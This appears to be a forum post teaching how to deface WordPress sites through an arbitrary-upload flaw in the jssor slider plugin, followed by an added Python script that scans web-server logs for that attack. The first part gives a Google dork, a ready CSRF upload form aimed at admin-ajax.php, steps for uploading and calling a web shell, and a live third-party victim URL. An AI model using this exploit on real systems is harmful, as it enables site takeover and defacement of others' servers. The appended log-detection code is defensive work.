Deface Wordpress Json Slider


Assalamualaikum wr wb
Deface Wordpress Json Slider Vulnerability Upload With CSRF
Extensions that can be uploaded: PHP, HTML
=====================================
Google Dork: inurl:''/wp-content/jssor-slider/jssor-uploads/''

Exploit:http://site.com/wp-content/jssor-slider/jssor-uploads/
=====================================
CSRF (Cross-Site Request Forgery):
<html>
<body>
<form action="http://targetmu.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
=====================================
Steps:
1. Dork on Google
2. Pick a website and enter the exploit path
If it returns Forbidden or a blank page, it is usually vulnerable
3. Then open the CSRF form and upload the shell
If the upload succeeds, it looks like this

4. How to call your shell
  path http://sites.com/wp-content/jssor-slider/jssor-uploads/shell.php


Live Target http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/ha.html
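
For site owners, the requests described above leave a clear trail in the web server access log. The following is an added example, not part of the original post: it scans Apache/nginx combined-format log lines for the upload request to admin-ajax.php and for PHP or HTML files served from the jssor-uploads directory. The sample log lines, IP addresses and file names are constructed, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

UPLOAD_DIR = "/wp-content/jssor-slider/jssor-uploads/"     # directory named on the page
ACTIVE_EXT = re.compile(r"\.(php\d?|phtml|html?)$", re.I)  # page: PHP and HTML are accepted
LINE_RE = re.compile(  # Apache/nginx "combined" access-log prefix
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(method, target):
    """Label one request as 'upload', 'probe' or 'fetch'; None if unrelated."""
    url = urlsplit(target)
    path, query = url.path.lower(), parse_qs(url.query)
    if (method == "POST" and path.endswith("/wp-admin/admin-ajax.php")
            and "upload_slide" in query.get("param", [])
            and "upload_library" in query.get("action", [])):
        return "upload"                  # the form action shown on the page
    if UPLOAD_DIR in path:
        name = path.split(UPLOAD_DIR, 1)[1]
        if not name:
            return "probe"               # bare directory request
        if ACTIVE_EXT.search(name):
            return "fetch"               # script or HTML served from the uploads dir
    return None

def scan(lines):
    """Return (line_no, ip, label, status, chained) per hit; chained marks a
    fetch from a client that sent the upload request earlier in the log."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        label = classify(m["method"], m["target"]) if m else None
        if label is None:
            continue
        if label == "upload":
            uploaders.add(m["ip"])
        findings.append((n, m["ip"], label, int(m["status"]),
                         label == "fetch" and m["ip"] in uploaders))
    return findings

# Constructed sample log (documentation IP ranges, made-up file names).
_T = "[10/Oct/2023:13:55:36 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_T} "GET /wp-content/jssor-slider/jssor-uploads/ HTTP/1.1" 403 199 "-" "-"',
    f'203.0.113.7 - - {_T} "POST /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library HTTP/1.1" 200 57 "-" "-"',
    f'203.0.113.7 - - {_T} "GET /wp-content/jssor-slider/jssor-uploads/x.php HTTP/1.1" 200 812 "-" "-"',
    f'198.51.100.20 - - {_T} "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "-"',
    f'198.51.100.20 - - {_T} "GET /wp-content/jssor-slider/jssor-uploads/banner.jpg HTTP/1.1" 200 9000 "-" "-"',
    f'198.51.100.20 - - {_T} "GET /wp-content/jssor-slider/jssor-uploads/notice.html HTTP/1.1" 200 300 "-" "-"',
]
if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A fetch hit with chained set to True and status 200 means a file uploaded through that endpoint was served back to the same client, so the uploads directory should be reviewed for files that are not slider images.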



